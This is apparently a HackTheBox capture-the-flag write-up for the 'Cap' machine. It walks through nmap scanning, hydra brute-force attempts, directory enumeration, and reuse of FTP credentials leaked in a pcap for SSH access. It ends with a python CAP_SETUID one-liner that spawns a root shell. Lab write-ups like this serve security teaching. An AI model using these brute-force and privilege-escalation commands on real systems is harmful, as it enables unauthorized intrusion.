CAP 10.10.10.245

Background

CAP is a Linux base machine from HackTheBox that required your patient on web searching technique and using privilege escalation using SUID skills.

A statistic website, that saved user's network access records, was deployed. One of the records contained an FTP transaction history that stored the login id and password in cleartext. This credential can be used to access the target machine via ssh protocol.

After getting the initial access, using LinPEAS to search the possible privilege escalation loophole. Finally, it was found that the "Capabilities" of the python was the jump hole to the root access.

https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/

130n@calvinlai.com

Target Machine: 10.10.10.245

Attacker Machine: 10.10.14.3

Hacking Process Part 0 – Service Scanning

Nmap

1) nmap -p- -T5 --min-rate=1000 10.10.10.245 -oG fkclai.nmap

2) nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.245 -o nmap-result.txt

# Nmap 7.80 scan initiated Thu Sep  2 22:52:29 2021 as: nmap -p 21,22,80, -sC -sV -o nmap-result.txt 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.35s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Thu, 02 Sep 2021 14:58:29 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Thu, 02 Sep 2021 14:58:21 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Thu, 02 Sep 2021 14:58:22 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, GET, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=9/2%Time=6130E536%P=x86_64-pc-linux-gnu%r(GetRe
SF:quest,2FE5,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20T
SF:hu,\x2002\x20Sep\x202021\x2014:58:21\x20GMT\r\nConnection:\x20close\r\n
SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x201938
SF:6\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\">\n
SF:\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20
SF:<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x
SF:20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<meta\x
SF:20name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1
SF:\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"image/
SF:png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x20<l
SF:ink\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css\">\
SF:n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/font
SF:-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20h
SF:ref=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20rel=\
SF:"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20\x20
SF:<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.min\.c
SF:ss\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/cs
SF:s/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOptions
SF:,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Thu,\x20
SF:02\x20Sep\x202021\x2014:58:22\x20GMT\r\nConnection:\x20close\r\nContent
SF:-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20OPTIONS,\x20GET,\x20
SF:HEAD\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1\x20
SF:400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\x20\
SF:x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<body>\n
SF:\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Invalid
SF:\x20HTTP\x20Version\x20&#x27;Invalid\x20HTTP\x20Version:\x20&#x27;RTSP/
SF:1\.0&#x27;&#x27;\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,189,
SF:"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x20Th
SF:u,\x2002\x20Sep\x202021\x2014:58:29\x20GMT\r\nConnection:\x20close\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20232\r
SF:\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20F
SF:inal//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\
SF:n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20serv
SF:er\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20che
SF:ck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep  2 22:55:03 2021 -- 1 IP address (1 host up) scanned in 154.69 seconds

Enumeration stratgies

No vulnerability was found on the HTTP server and SSH/FTP service according to the Nmap result. we can only focus on the following two enumeration 1) FTP/SSH 2) Web enumeration

Hacking Process Part 1 – Enumeration

FTP/SSH enumeration Nothing can be done other than the brute focus attack on the FTP and SSH port. However, the result is negative.

ftp 21
hydra -l root -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.245

ssh 22
hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.10.245 -t 4 ssh

Web enumeration 1) Searching hidden subfolders

dirb http://10.10.10.245/ /usr/share/wordlists/dirb/common.txt -o dirb-245.result 

gobuster dir -u 'http://10.10.10.245/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-245.result

the following subfolders were found and a list of subfolders under the data directory was found.

http://10.10.10.245/data (CODE:302|SIZE:208)
http://10.10.10.245/ip (CODE:200|SIZE:17374)
http://10.10.10.245/netstat (CODE:200|SIZE:31079)

2) searching the website

When visiting the website found a download link that pointing to the pcap file. Download the firstpcap file fromhttp://cap.htb/data/18 No useful information was found after reading this file. Base on the result of folder enumeration above, an FTP login credential was found.

Hacking Process Part 2 – Gaining Foothold

Using the credential found at the pcap file, that can be successful ssh to the target machine and read the user.txt file.

After getting the initial access, the next step is to upload the linpeas.sh and start the PE scanning.

Hacking Process Part 3 – Privilege Escalation

Because of the project name "CAP", a finding related to the Capabilities is interesting to me. when the binary has the Linux CAP_SETUID capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.

After read several articles, the paper wrote by Raj Chandel provided a detailed explanation of how this capability can be gain the privilege escalation using the following command.

cp $(which python) .
sudo setcap cap_setuid+ep python

./python -c 'import os; os.setuid(0); os.system("/bin/sh")'

Conclusion

FTP is an insecure protocol that transfers data in plain text. It is the critical point that helps to gain the foothold. In addition, the user nathan received the privilege to run the python3 program as root is another security loophole.

The system admin should be aware of security loopholes during enabling system service and assigning such capability which can affect the integrity of the kernel that can lead to privilege escalation.

Reference

https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/

PreviousBountyHunter 10.10.11.100 NextSpectra 10.10.10.229

Last updated 3 years ago

Was this helpful?